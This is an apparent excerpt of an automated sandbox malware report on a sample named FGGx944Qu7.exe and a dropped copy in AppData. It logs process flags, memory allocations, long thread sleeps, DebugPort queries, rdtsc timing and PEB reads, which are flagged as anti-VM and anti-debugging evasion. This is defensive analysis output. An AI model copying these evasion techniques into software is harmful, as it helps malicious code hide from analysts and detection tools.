Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: FGGx944Qu7.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TBsjWljiCpR.exe PID: 7680, type: MEMORYSTR

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 15E0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 3010000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 6290000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 7290000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 73C0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 83C0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 8620000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 9620000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: A620000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: B620000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: C270000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: D270000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: E270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 1610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 3090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 6150000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 7150000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 7280000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 8280000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 84D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 94D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 7280000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 84D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 94D0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 8_2_0163096E rdtsc

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5555
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5875
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Window / User API: threadDelayed 2042
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Window / User API: threadDelayed 7930

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	API coverage: 0.7 %
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	API coverage: 0.3 %

Source: C:\Users\user\Desktop\FGGx944Qu7.exe TID: 7272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488	Thread sleep count: 5555 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep count: 194 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe TID: 7804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep count: 2042 > 30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep time: -4084000s >= -30000s
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep count: 7930 > 30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep time: -15860000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Thread delayed: delay time: 922337203685477

Source: usFxdnRPYjnb.exe, 00000013.00000002.2863023876.00000000012A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: firefox.exe, 00000014.00000002.2544008849.00000282D43FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::k
Source: SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO&i

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 8_2_0163096E rdtsc

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 8_2_00417393 LdrLoadDll,

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC156 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01688158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620124 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C61E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016201F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01630185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686030 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01674000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]
